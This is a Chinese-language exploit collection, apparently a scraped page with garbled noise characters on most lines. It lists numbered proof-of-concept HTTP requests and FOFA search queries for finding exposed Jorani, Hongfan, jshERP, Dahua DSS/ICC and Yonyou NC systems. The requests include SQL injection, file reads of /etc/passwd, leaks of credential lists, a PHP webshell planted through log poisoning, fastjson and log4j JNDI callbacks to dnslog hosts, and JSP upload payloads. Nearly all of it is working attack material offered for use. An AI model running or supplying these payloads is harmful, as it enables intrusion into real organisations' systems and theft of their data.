GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.12 l5 |9 x7 x2 l* R; t' A1 K( o
Host: 127.0.0.1& x3 A% w- a/ _" E* d. U. q
Pragma: no-cache* Q# `3 b, e0 z9 ?6 |
Cache-Control: no-cache
# V+ C9 x7 d$ m" XUpgrade-Insecure-Requests: 1
" R! t: l2 H3 _, x7 E" t2 ^ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 W3 ~$ n+ _( _! x1 ^8 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ J" J1 ~ b9 [: j3 \
Accept-Encoding: gzip, deflate
/ i5 O- _+ j% dAccept-Language: zh-CN,zh;q=0.9,en;q=0.8; i k3 B4 n7 j) F) H3 E: R# X
Connection: close4 G- A: |0 w v1 K& S7 _
" M0 W( B2 T! H1 _; K# P! T0 c1 Q9 M. @. L" m, R% ?# }$ y0 ]2 h
12. Jorani < 1.0.2 远程命令执行
3 x" g2 } j$ ~FOFA:title="Jorani"+ H8 U* z- q2 c: P* n: @
第一步先拿到cookie: X9 \3 @. i/ X8 v4 r7 V9 d
GET /session/login HTTP/1.1, D3 E, d" A) p# a9 q
Host: 192.168.190.301 s" k2 j5 u9 b. \: C
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 W7 H1 x6 u7 g
Connection: close
+ k! y3 [! B! t5 OAccept-Encoding: gzip+ p' b# H! M9 R; P6 e: p1 J
+ S& J1 V3 C) G& y2 C
/ @' C/ y5 l0 H) ?- q6 c响应中csrf_cookie_jorani用于后续请求) X8 F* _& B2 `) U# s: v) _
HTTP/1.1 200 OK
8 S7 U6 T4 T- F3 @6 N0 w* _Connection: close
1 t: T- U% q8 {Cache-Control: no-store, no-cache, must-revalidate
& B3 \! X/ b- u `, bContent-Type: text/html; charset=UTF-8- J# g+ {$ r; f" x
Date: Tue, 24 Oct 2023 09:34:28 GMT" X- T6 K+ U; l# u( \4 z7 p _& _6 [
Expires: Thu, 19 Nov 1981 08:52:00 GMT6 W' ^$ l* o' n5 @4 W2 X1 D4 {
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT4 ?/ m4 o3 {4 Q/ c4 B
Pragma: no-cache
; c; f1 m) _. Y6 s' Z. h1 pServer: Apache/2.4.54 (Debian)8 U+ P+ p9 ]) s" r# v
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" F% R' K. t( c+ {/ O- a* M/ mSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly0 T" O& s4 p4 Y5 ^
Vary: Accept-Encoding, ]! w3 ?7 E# d' M! R
8 q3 U8 _# k5 `, M2 K i9 E! y
& r8 m1 @+ p, k6 Q2 QPOST请求,执行函数并进行base64编码1 c2 X. Y, v: v1 @3 m) }
POST /session/login HTTP/1.1( ~5 t* M% q, {: }
Host: 192.168.190.30: b% C; G" k' [9 r. W% v1 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
, |" {/ R- r" B' T% ~7 \Connection: close
9 A& m6 m& h1 ~Content-Length: 252
; e+ u- L$ c2 K/ c& k* s8 iContent-Type: application/x-www-form-urlencoded
7 f/ h$ \+ z% h H# C4 T" | YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
- E' q/ e3 p& t) }+ g" OAccept-Encoding: gzip+ d8 k7 l: N4 l/ M! o
' \; T, ]# i+ H7 b! ~& L$ h! Kcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
3 X. Z% ^" c: C- D T! Q2 W( e# N5 P
9 E; [& f9 y& j
T! a; I# Y" d; T) P' G. q0 w
! s# K* T6 o. Q向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- ]5 r% S- }7 F% E- Z6 P* m4 r- b
GET /pages/view/log-2023-10-24 HTTP/1.1
0 s7 I% z0 T8 p" Z1 k/ }! nHost: 192.168.190.30
/ N9 Z$ D/ O* i' [$ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! z; s9 w# s7 } c0 k1 z0 PConnection: close6 }" D1 l* _0 Q$ o8 D* I. \
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 P# u2 r# J: f; l; z5 h
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
2 e2 g" N/ P9 @, qX-REQUESTED-WITH: XMLHttpRequest
# ]2 i, R. A: |- k" g2 gAccept-Encoding: gzip
0 z9 R5 z- _+ i4 K0 t8 a! X3 |) e7 b6 D4 [0 V. {
; D! }% D' y3 ?* c13. 红帆iOffice ioFileDown任意文件读取
% K0 d! m7 I2 m" B% X* ?FOFA:app="红帆-ioffice"
7 M0 B- u0 {+ @) ]) B& h* SGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
5 q* o2 c9 B" a+ S- f. aHost: x.x.x.x2 M9 X5 v9 q7 W3 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. @) s; `0 y& K( c& g. ]2 |
Connection: close3 o4 q* @ e o, {7 `7 s
Accept: */*8 Q9 u1 x, j" J5 A% S; y1 g
Accept-Encoding: gzip l, X8 n' L& s, A& L6 G: X
& y' i7 n( R2 N( P
. r, V1 y# P( T14. 华夏ERP(jshERP)敏感信息泄露3 ?0 H' O* ^ v
FOFA:body="jshERP-boot"
: T4 h* e+ U5 V7 P泄露内容包括用户名密码9 w9 P9 i# o# E2 h0 I
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' k8 K+ P" ]1 k# h) h, ~1 e; IHost: x.x.x.x& R, ?9 A5 r# ~ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* i F( l; d. b, b I( [
Connection: close$ }/ w' a1 I) ?) @) |3 x
Accept: */*
: l) l: J# G( @1 d, }9 I% c" FAccept-Language: en
% a. ]9 c5 D* X# E6 K9 FAccept-Encoding: gzip
# S; E0 [: K, V/ \5 M. R
4 Z( t6 |3 b9 l. i7 ]
( @ V% ?) {# l5 b/ C% @/ w15. 华夏ERP getAllList信息泄露& u( T# D: ~9 ~# I3 C5 u) ?4 Y
CVE-2024-04905 i! O" I* R$ ^! ^$ U* Y
FOFA:body="jshERP-boot"4 d( j/ w% i, [% d$ I
泄露内容包括用户名密码, o$ r* Y# c' G/ u" {( D
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
( M8 O1 I/ {6 I6 V- o# `; K6 y2 _Host: 192.168.40.130:1000 |. p! x* P' X/ [9 K& S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 ^4 r$ L- K1 oConnection: close
# H# U% ?0 u+ }& i2 X V9 FAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 V, }7 K0 J7 N! r6 l# E
Accept-Language: en
0 w1 ]" E, b6 ssec-ch-ua-platform: Windows. \" H4 T! b& m5 S# F6 c
Accept-Encoding: gzip
; n+ j2 N; `1 O' @3 T* O0 J
$ V& ~ h0 X1 J! S: @
5 ?3 E g( Y3 Z3 @& _" x0 }9 @16. 红帆HFOffice医微云SQL注入
3 V }, p3 o2 B9 gFOFA:title="HFOffice"
2 p1 ~% r" v: Fpoc中调用函数计算1234的md5值
( X4 `& D% y! b2 D4 w% qGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.16 K0 j o' N) T# H( q
Host: x.x.x.x
- m: e$ j8 |* E! HUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 g9 z0 q, b8 }8 B! `Connection: close
( B* _# A1 r/ Y9 i$ g" o' u) O" ^Accept: */*
6 p) l- N$ Z+ O. B: A3 CAccept-Language: en1 R! {# a6 _. Y/ z. a
Accept-Encoding: gzip4 c& H- [5 U1 r& j u8 _
' W) o* h8 \. C2 F
1 L" W8 e, U2 O; f- \/ i
17. 大华 DSS itcBulletin SQL 注入3 u, Q! ]1 b/ W
FOFA:app="dahua-DSS"
2 G/ J- R/ I0 w3 ?& FPOST /portal/services/itcBulletin?wsdl HTTP/1.1- `$ e0 w0 B" {; l# x6 \+ I* ^- z* [
Host: x.x.x.x
) r. N3 z4 Y) n- b yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ D; z8 i9 H7 e3 J8 k* O( ^Connection: close: }# b, v# P. L( e: ^ s: P% \
Content-Length: 345
8 P& ]+ h- R# J0 o" |% yAccept-Encoding: gzip
; P1 T8 q6 J( P4 \4 x- W
$ `8 R6 i; V7 |<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>- f+ `! p: Q% R: U1 Z: X
<s11:Body>
8 [& e- k; @8 ]5 f <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
/ X" C( x6 A" j/ d6 \+ Q8 ]5 { <netMarkings>
) Q' ] ^, c+ T (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
8 `* C- `& C6 x8 z) D9 V$ G0 F$ w </netMarkings>
/ ?+ r# o6 v+ E" X Z </ns1:deleteBulletin>8 B0 z" m+ }7 Z% \# _
</s11:Body>( J/ F" r1 ~5 h7 ^
</s11:Envelope>
. B* ] v' W9 t2 b0 P- J: Y1 i* `$ a, \2 B
* Q/ {- e" Y: H9 t
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 I# H4 f: a. H" RFOFA:app="dahua-DSS"4 S3 y- y% [& \
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.18 [ y# I" j: [1 o3 o! o9 |) D
Host: your-ip- v# y, V; G1 b. c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 f1 ~" w" k3 }5 A
Accept-Encoding: gzip, deflate
/ d+ r: Y- q/ }9 L2 [: EAccept: */*. y/ p; {( \0 ~3 N9 k4 h; ~' t9 v
Connection: keep-alive9 {( l1 Z' |1 F* q1 w
) W0 A: O ~, ]
2 Q. y+ g3 B/ |" A4 c2 h" z
+ [; k" J( {6 [9 h, o2 _
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入+ l. a0 G9 X6 S& p
FOFA:app="dahua-DSS"7 k4 _7 |: A( L) V O; k: N
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
6 M, v6 ?! K" PHost:( S2 J$ p( u, e0 m# l, Y0 W+ K7 s
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* }4 S0 N, q( B+ }, IAccept-Encoding: gzip, deflate: q: }9 x* k( A
Accept: */*& N) }1 W5 m4 P, d' v0 c8 |6 k
Connection: keep-alive: R; O' m: a4 [4 s" q/ |* H( D! u4 h
( m5 U: Q% Z8 @$ _9 A+ t9 Z
/ C5 T, C& Z/ B, v0 N8 n4 B3 Z3 \3 h
20. 大华ICC智能物联综合管理平台任意文件读取3 D3 F& T$ u% j' d
FOFA:body="*客户端会小于800*"6 S" W) u+ ?9 j8 |6 H% S
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.15 I! ^9 p- Q% y
Host: x.x.x.x
+ ?9 h7 G8 R5 n' Y; b- NUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# ~2 v3 H7 `1 n" d! @$ C7 iConnection: close- D* o' I4 T- ?4 z1 y1 z
Accept: */*7 S$ J! `& z& A" F4 s! X1 h
Accept-Language: en
3 X+ m# S7 E1 f- U" kAccept-Encoding: gzip
q) o+ K4 H h3 X3 I. _" E8 Z9 t' w6 m% k8 `
( a. e3 e* P4 m7 L& g
21. 大华ICC智能物联综合管理平台random远程代码执行( y* f! b2 k6 B0 q
FOFA:icon_hash="-1935899595"" D4 O @7 U/ ~' W6 R: b" r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.18 N' G$ K( z9 s: I$ {% \4 q; S
Host: x.x.x.x
; X5 ~' b6 w U( n$ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 x" m3 s F1 S$ a1 A6 Z- lContent-Length: 1619 Z( \2 F: o3 F2 @
Accept-Encoding: gzip
5 p$ @% }+ G& n' e8 Y8 e$ O' aConnection: close' X0 ?# Y+ W' v& O% b! K. G/ ]
Content-Type: application/json;charset=utf-8/ K! _$ Q5 ~5 R* p
' z1 J- K2 J6 a' i: f; V, e& P{
( O1 P* Q' V7 t* s+ Z' t"a":{) I" M7 l2 B) o% b8 j
"@type":"com.alibaba.fastjson.JSONObject",
, {/ n- X0 R. \3 q {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
: A. q" k) A/ d) ?* ]+ O/ ` }""; R8 L" ]* W+ [8 Q5 o
}3 t- h7 |0 F# I, h Z, E1 ], Z
) }' ^" Z$ A+ B
! d |" k, O- m9 \, l8 X& C, y22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 d6 m; ^5 e: d
FOFA:icon_hash="-1935899595"
7 s" s/ I8 S [& ?POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, n1 [( u x. p4 P% B9 A3 P' {& R+ O+ t
Host: your-ip% h% h1 @9 i* m0 h P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 o% k, O3 `: w( d6 f" D
Content-Type: application/json;charset=utf-8
8 V- ~% r7 ]. i1 ~8 F% z$ C8 ^6 D6 U0 N. V* o! G
{* s4 Y7 D% m) i
"loginName":"${jndi:ldap://dnslog}"
* \$ S) e2 h( Q" W& r4 A+ P7 q& ~}
4 T! T) j; B. s# n( L- D9 c, x7 ?
/ i) Y) w3 R' h8 d" m7 p' N6 ]
* n) K2 b, i6 k. I, _7 x" }( Y: S5 J/ l1 `* S9 p7 L& R
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ |6 |4 w2 ^& n6 Z1 w! x# {1 f
FOFA:icon_hash="-1935899595") ` } m5 K1 J% d! ^4 W. R
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( y* _4 _" U) L% P* J8 G
Host: your-ip( t) e5 a* I+ ]* [0 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 q# [. x; d( V1 B: y+ F
Content-Type: application/json;charset=utf-8' ^1 M$ R/ l- j% N
Accept-Encoding: gzip
+ ~/ d$ q, ?3 t2 |1 ?, v( UConnection: close
! n! J& N% ^) A2 J& C, B
, M# f* E- U/ ~( R! a{; Y" v% P6 k8 R% k
"a":{
$ q/ x! T) q/ _, R9 y Z "@type":"com.alibaba.fastjson.JSONObject",
# Q$ Q; q& b$ B" \$ O" [ {"@type":"java.net.URL","val":"http://DNSLOG"}
* z8 J4 L' k7 J }""# Q2 I5 O7 @4 t% e# @6 B9 b" y
}
2 A1 d7 z& o8 X5 }5 X# l! D# N, d. R" @6 V
) D j* M: Y* v0 D
24. 用友NC 6.5 accept.jsp任意文件上传
; u0 c# J! h5 q* H( h# qFOFA:icon_hash="1085941792"5 D. s# p) G- [' ~/ R
POST /aim/equipmap/accept.jsp HTTP/1.14 e P2 x0 K u7 B( J. _3 j' B
Host: x.x.x.x
& j) R2 @5 |; p1 Z7 t4 t( T1 I' fUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
. ]3 y+ R- Q7 r7 J1 `& ]" @Connection: close
* u; n9 Q; i( F8 r' ^Content-Length: 449& j5 Z ?$ p' j2 g; d' L
Accept: */*
5 I8 O! j5 \0 ~% I* P+ }( `Accept-Encoding: gzip/ X' C. S0 S' _2 q, j% n6 F) F
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
U" O9 F6 U; g. K. A. q7 ?8 i
1 P2 \7 @2 H5 l+ b' X-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 c! \( Y. u/ h$ @8 c0 iContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"- g$ j" g# m5 Y
Content-Type: text/plain
( h, H" x' |% A0 I0 o4 N) e o! S1 J, E
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>) j, e! \/ G3 }/ t2 u: [0 g* {1 b+ y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc; P5 a8 @/ F7 ~6 b) T( g
Content-Disposition: form-data; name="fname"; d0 R, @- ~0 V4 a# O& ~
5 N9 S2 K/ W4 n) c\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; F# N# x+ d3 o7 y-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--, T& X' [/ Z' C3 Y X
6 J4 E- b* {/ z7 ?- J0 i
; |/ F8 M' M- P: F25. 用友NC registerServlet JNDI 远程代码执行6 ~3 J# @1 M6 v. I& R
FOFA:app="用友-UFIDA-NC"; s& p `, t: G, W- X
POST /portal/registerServlet HTTP/1.1 `" Y) M1 O# x* N
Host: your-ip j1 n" v9 m1 D+ d* P& ?& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.02 E# H3 B8 i9 f2 W, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
$ g- e& s9 I) O& I& x# b. N/ eAccept-Encoding: gzip, deflate7 O& d5 P2 r- @) e: Z
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
! y a1 D0 R5 i' F) @7 B4 lContent-Type: application/x-www-form-urlencoded+ b1 F y5 h3 C+ z" }! @7 s1 h- \
! @$ Y* p7 M- [" |0 Z2 Utype=1&dsname=ldap://dnslog
% ~* f& Y, ?* U
' L# C3 F, M. g
% C6 u! a* I+ C9 ^" o* F6 U% d( U- e3 j3 O
26. 用友NC linkVoucher SQL注入
3 u: Q( X: o4 f1 P8 n# rFOFA:app="用友-UFIDA-NC"
9 Y Y" F- F, j9 Q, DGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 l3 p+ Y& {- j3 w# sHost: your-ip
1 S5 R7 U. p1 k. }) {6 w2 Z* sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 V0 I; \2 U }- z! ^0 Z
Content-Type: application/x-www-form-urlencoded
0 t* t, {% Y+ A. v3 n; @$ _4 mAccept-Encoding: gzip, deflate
; P# d0 F1 G1 s# y0 bAccept: */*
2 a1 d( ?9 `) Q1 t1 N7 { oConnection: keep-alive
. h( B+ l) a9 h) D& ^9 K1 P- T; Y8 @1 [+ h
) i* d) }! V* r# i' S$ ?/ D+ n2 }
27. 用友 NC showcontent SQL注入
Q" d0 F, q% J1 B5 A, A, C0 ]FOFA:icon_hash="1085941792"
v" K* }* a. o2 U6 BGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
) j1 t& ` E9 y7 w: I4 G7 Y' `Host: your-ip
/ Y9 P/ N; [) B& o# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 Q: P* v" \8 ~4 r
Accept-Encoding: identity
( K$ L/ o3 U6 C4 n' s. n# FConnection: close+ g# w- a5 r" @7 ?* v8 r
Content-Type: text/xml; charset=utf-8. p4 f0 q% {0 A8 F) Y
) C/ K9 d5 w& ]5 \6 T; ^
7 V9 l5 O% R" q) D
28. 用友NC grouptemplet 任意文件上传- }' C. m( y6 d5 x
FOFA:icon_hash="1085941792"
$ y* Q3 t8 r; r9 ] I: iPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1* R7 M' d$ _3 K* ^+ u7 C6 u# f. p
Host: x.x.x.x% u0 U' a( R7 a3 J) }" X0 ?! ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
. Z, K9 t4 X/ j' l6 Y, H" x8 fConnection: close$ a7 w, r( d1 r' b
Content-Length: 268! j% v6 e# I1 a
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' G% R" O, a/ U% |2 YAccept-Encoding: gzip
* i7 }+ w) U- |3 N0 s8 j! j6 `9 e" t0 S4 P' o* u4 Z" M
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, `; N+ ]) _1 Z; O8 ?
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"9 o0 t( h5 U5 C, p' P9 o' g
Content-Type: application/octet-stream
/ |9 c$ F- x9 ?/ p Z+ w9 s( \: f" G5 M/ G9 d8 l( _, z
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
2 f- ]* e) N5 o5 K# | |------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
9 A3 P( G; L0 S0 u$ O3 W# @
" m# B [% K7 g5 L4 C5 S" f7 T) `! V- x' a% K( D. r4 ^4 j
/uapim/static/pages/nc/head.jsp9 e0 a: i- v- v M: U4 o
# X# E5 U2 j; W" s& {& k29. 用友NC down/bill SQL注入0 G7 U5 D# _ l5 }
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 a% L, p% A9 @
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% v$ L. i0 |1 i4 g! Q) Y# yHost: your-ip
1 K# E8 w- W/ f" j% p! A. m) {, G7 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 [* l* Q, O+ |
Content-Type: application/x-www-form-urlencoded7 ?4 E- N W4 k) k8 Q. k
Accept-Encoding: gzip, deflate
* O" r5 l9 ^2 k1 n/ f( MAccept: */*
4 n) `; ~* x0 k4 y+ [) B# U2 {Connection: keep-alive
% T9 s1 k" i* E/ w
8 e. [% A* @- \$ Y, e9 m' s& ^% A4 d3 L5 l0 k1 I
30. 用友NC importPml SQL注入
! p* `! [7 X0 m* B) ^2 U* bFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& k# Z) L S9 d; sPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
7 X: u* N/ V5 U' e! uHost: your-ip5 J: ?' y# ^" G2 [! X+ f( Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V! @- I3 k1 _3 [% d9 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: f R! ` \# K& L' n- I: q
Connection: close; V& ^: k; S3 ^& i w
6 l5 U4 T3 q; E. `4 H! s6 a------WebKitFormBoundaryH970hbttBhoCyj9V) \% s; Q( `$ o
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"$ v+ G* J3 o/ Y9 k8 b
Content-Type: image/jpeg
% c2 b D) [* Z7 R* H------WebKitFormBoundaryH970hbttBhoCyj9V--& b: O0 u- a$ N) F( S3 i" ?: J! j3 O
2 e+ d0 r6 w$ N1 \7 q4 G o; e* U0 x. r* M. G
31. 用友NC runStateServlet SQL注入( r$ b+ @& Q1 L7 ]1 k3 w8 S; v
version<=6.5# X& O! h2 y7 H, t
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, y8 s6 G% |, c* i/ @GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 R2 d' L. u( m7 a: W2 [Host: host8 k8 U" G& z$ p' v+ f+ Y* r5 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- l- W. D: D ]9 @; ~
Content-Type: application/x-www-form-urlencoded/ r2 j& V7 ^, i* q. M( [: x8 b; x/ H
" u8 T4 Y7 ^" e9 W
! [' ~( N5 b: k% p32. 用友NC complainbilldetail SQL注入
" C. `8 l6 B0 {% fversion= NC633、NC65
3 B8 l! g9 b" D; TFOFA:app="用友-UFIDA-NC"/ ^8 [ Z# K! d+ {6 Y
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.16 z. e/ m, p- M9 Y, L$ T% U' i9 A
Host: your-ip+ h4 M7 R1 s- Q4 S. X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 d' |, ^# Y$ E' ~# VContent-Type: application/x-www-form-urlencoded
5 E( L) A N5 F: R* o/ ^Accept-Encoding: gzip, deflate8 l9 b$ r% I' ]. [; b
Accept: */*
3 O+ _+ h4 \# Z1 [Connection: keep-alive
2 R1 w( S/ [) D. |9 J" }0 G v9 w* M3 {
& i- \+ ]+ V3 C( V: C6 x33. 用友NC downTax/download SQL注入
1 @& G) L3 C. H* ^9 |4 L2 Gversion:NC6.5FOFA:app="用友-UFIDA-NC", R: [, K0 T) T1 |6 @+ _
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 t4 D. [) e3 AHost: your-ip
' D2 j) R6 X4 @! o" nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 n# ~& [" q. d9 Z5 j$ vContent-Type: application/x-www-form-urlencoded
8 ~6 D/ c* T1 FAccept-Encoding: gzip, deflate
9 H$ r# ]1 `1 a \% q+ bAccept: */*
4 U% M5 j% \: wConnection: keep-alive
% \: G. R( y( M3 l( g6 v6 Y2 A i8 G/ }
t7 o4 n2 D" ]8 C34. 用友NC warningDetailInfo接口SQL注入
* k* T- d6 Z; BFOFA:app="用友-UFIDA-NC"7 k" f. B; A) _5 k+ X
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ h' b, i) c. S4 [
Host: your-ip
) b% O$ u& e* B, J" W( O+ R5 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ r% \( B$ u' T/ i5 g% }Content-Type: application/x-www-form-urlencoded5 U/ c8 f( Z; j) \! K
Accept-Encoding: gzip, deflate
! c" J4 R v6 EAccept: */*' D, `+ P z- h& C$ k/ X' E
Connection: keep-alive$ d- B* @; Y1 A( o
! x& |# y( |/ P, R# @. g
% y* j* s; L q
35. 用友NC-Cloud importhttpscer任意文件上传
+ e- }: P+ R* e e, a% D+ N9 }FOFA:app="用友-NC-Cloud"
